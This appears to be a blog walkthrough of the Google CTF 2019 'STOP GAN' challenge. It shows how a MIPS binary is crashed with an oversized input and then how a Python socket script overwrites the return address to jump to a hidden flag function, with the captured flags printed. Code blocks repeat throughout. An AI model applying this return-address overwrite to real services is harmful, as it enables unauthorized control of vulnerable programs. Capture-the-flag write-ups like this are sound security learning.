Google CTF 2019

STOP GAN

Well it seems someone can’t keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said “Loose Zips sink large commercial properties with a responsibility to the shareholders.” You wonder if there is a similar concept here. Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child. The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you’re meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity. You need to get in closer to save them – you beat on the window, but you need access to the cauliflower’s host to rescue it.

buffer-overflow.ctfcompetition.com 1337

Attachement

You can find my all CTF solution in here

When I donwloaded the attachment I saw .c and some mips binary code.

wget https://storage.googleapis.com/gctf-2019-attachments/4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a
mv 4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a Stop_Gan.zip
unzip Stop_Gan.zip 
Archive:  Stop_Gan.zip
 extracting: bof                     
 extracting: console.c               
ls
bof  console.c  pic  Stop_Gan.zipfile console.c 
console.c: C source, ASCII text
file bof
bof: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a31c48679f10dc6945e7b5e3a88b979bebe752e3, not stripped

wget https://storage.googleapis.com/gctf-2019-attachments/4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a

mv 4a8becb637ed2b45e247d482ea9df123eb01115fc33583c2fa0e4a69b760af4a Stop_Gan.zip

unzip Stop_Gan.zip

Archive: Stop_Gan.zip

extracting: bof

extracting: console.c

bof console.c pic Stop_Gan.zipfile console.c

console.c: C source, ASCII text

file bof

bof: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a31c48679f10dc6945e7b5e3a88b979bebe752e3, not stripped

In the .c code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/**
 * 6e: bufferflow triggering segfault  - binary, compile with:
 * gcc /tmp/console.c -o /tmp/console -static -s
 *
 * Console allows the player to get info on the binary.
 * Crashing bof will trigger the 1st flag.
 * Controlling the buffer overflow in bof will trigger the 2nd flag.
 */

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  char inputs[256];
  printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
  while(1) {
    printf("\nConsole commands: \nrun\nquit\n>>");
    if (fgets(inputs, 256, stdin) == NULL) {
      exit(0);
    }
    printf("Inputs: %s", inputs);
    if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
      int result = system("/usr/bin/qemu-mipsel-static ./bof");
      continue;
    } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
      exit(0);
    } else {
      puts("Unable to determine action from your input");
      exit(0);
    }
  }
  return 0;
}

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

/**

* 6e: bufferflow triggering segfault - binary, compile with:

* gcc /tmp/console.c -o /tmp/console -static -s

* Console allows the player to get info on the binary.

* Crashing bof will trigger the 1st flag.

* Controlling the buffer overflow in bof will trigger the 2nd flag.

int main() {

setbuf(stdin, NULL);

setbuf(stdout, NULL);

setbuf(stderr, NULL);

char inputs[256];

printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");

while(1) {

printf("\nConsole commands: \nrun\nquit\n>>");

if (fgets(inputs, 256, stdin) == NULL) {

exit(0);

}

printf("Inputs: %s", inputs);

if ( strncmp(inputs, "run\n\0", 256) == 0 ) {

int result = system("/usr/bin/qemu-mipsel-static ./bof");

continue;

} else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {

exit(0);

} else {

puts("Unable to determine action from your input");

exit(0);

}

return 0;

}

It says you can compile this source but I want to use original file.

I can open bof file with using qemu-mipsel.

In this question. As I understand we must to crash program with given input. So that in this case, I must to use buffer overflow method.

python -c "print 'a' * 500" | qemu-mipsel bof
Cauliflower systems never crash >>
segfault detected! ***CRASH***could not open flag

python -c "print 'a' * 500" | qemu-mipsel bof

Cauliflower systems never crash >>

segfault detected! ***CRASH***could not open flag

It happens. So that I will try in web service

nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
 Bonus flag for controlling the crash.

Console commands: 
run
quit
>>run
Inputs: run
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
CTF{Why_does_cauliflower_threaten_us}
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands: 
run
quit
>>

nc buffer-overflow.ctfcompetition.com 1337

Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.

Bonus flag for controlling the crash.

Console commands:

run

quit

>>run

Inputs: run

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

CTF{Why_does_cauliflower_threaten_us}

Cauliflower systems never crash >>

segfault detected! ***CRASH***

Console commands:

run

quit

It works. So I will try to with python code.

python -c "print('run\n' + 'a'*500)"| nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
 Bonus flag for controlling the crash.

Console commands: 
run
quit
>>Inputs: run
CTF{Why_does_cauliflower_threaten_us}
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands: 
run
quit

python -c "print('run\n' + 'a'*500)"| nc buffer-overflow.ctfcompetition.com 1337

Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.

Bonus flag for controlling the crash.

Console commands:

run

quit

>>Inputs: run

CTF{Why_does_cauliflower_threaten_us}

Cauliflower systems never crash >>

segfault detected! ***CRASH***

Console commands:

run

quit

Soo We found flag

CTF{Why_does_cauliflower_threaten_us}

Start to find Bonus flag.

I am try to find new adress for the print bonus flag. In this case I search functions in bof file

nm bof | grep flag
0049ffc0 D _dl_stack_flags
00400840 t local_flag

nm bof | grep flag

0049ffc0 D _dl_stack_flags

00400840 t local_flag

I found the loca_flag function in bof file

We can try to jump that adress with using bof vuln

I try to find where the return address start and it is 264 so that I write bellow python to extract bonus flag

#!/usr/bin/env python3

import socket
import time
def main():
        padding = "\x41" * 264
        address = "\x50\x08\x40"
        payload = padding + address + "\n"
        with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as soc:
                soc.connect(("buffer-overflow.ctfcompetition.com",1337))
                time.sleep(1)
                soc.recv(1024)
                soc.send("run\n".encode())
                soc.send(payload.encode())
                time.sleep(1)
                print(soc.recv(1024).decode("utf-8"))
if __name__ == "__main__":
        main()

#!/usr/bin/env python3

import socket

import time

def main():

padding = "\x41" * 264

address = "\x50\x08\x40"

payload = padding + address + "\n"

with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as soc:

soc.connect(("buffer-overflow.ctfcompetition.com",1337))

time.sleep(1)

soc.recv(1024)

soc.send("run\n".encode())

soc.send(payload.encode())

time.sleep(1)

print(soc.recv(1024).decode("utf-8"))

if __name__ == "__main__":

main()

Result:

./exploit.py 
Inputs: run
CTF{controlled_crash_causes_conditional_correspondence}
Cauliflower systems never crash >>

Console commands: 
run
quit
>>

./exploit.py

Inputs: run

CTF{controlled_crash_causes_conditional_correspondence}

Cauliflower systems never crash >>

Console commands:

run

quit

Flag: CTF{controlled_crash_causes_conditional_correspondence}

YlmzCmlttn

STOP GAN | Google CTF 2019

Google CTF 2019

STOP GAN

Leave a Reply Cancel reply